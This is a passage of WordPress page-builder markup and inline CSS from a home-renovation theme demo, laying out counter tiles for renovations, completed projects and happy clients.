only screen and (max-width: 767px){\n .block-a700bb13-4eda-4e5c-8be7-967307f8fe21 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a700bb13-4eda-4e5c-8be7-967307f8fe21\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"12aeb4d4-f632-4170-9079-bac303c5d07e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-12aeb4d4-f632-4170-9079-bac303c5d07e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7d0f753e-3b4f-4271-80fd-9da37c18a3b5\"} -->\n<style type=\"text/css\"> .block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7d0f753e-3b4f-4271-80fd-9da37c18a3b5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6e06920b-6b87-4a7b-9414-25661841a5d0\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6e06920b-6b87-4a7b-9414-25661841a5d0 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"11df0b03-3f02-459e-8963-619d6bb3ba7f\"} -->\n<style type=\"text/css\"> .block-11df0b03-3f02-459e-8963-619d6bb3ba7f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-11df0b03-3f02-459e-8963-619d6bb3ba7f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-11df0b03-3f02-459e-8963-619d6bb3ba7f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-11df0b03-3f02-459e-8963-619d6bb3ba7f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-11df0b03-3f02-459e-8963-619d6bb3ba7f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-11df0b03-3f02-459e-8963-619d6bb3ba7f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8741d442-79aa-4f9d-aa9a-5284b112452c\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8741d442-79aa-4f9d-aa9a-5284b112452c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"40cb1d51-3169-43ae-b77d-ad95a0a64aaa\"} -->\n<style type=\"text/css\"> .block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40cb1d51-3169-43ae-b77d-ad95a0a64aaa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ae062272-7a0d-44cf-80b7-b382aed119bf\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n 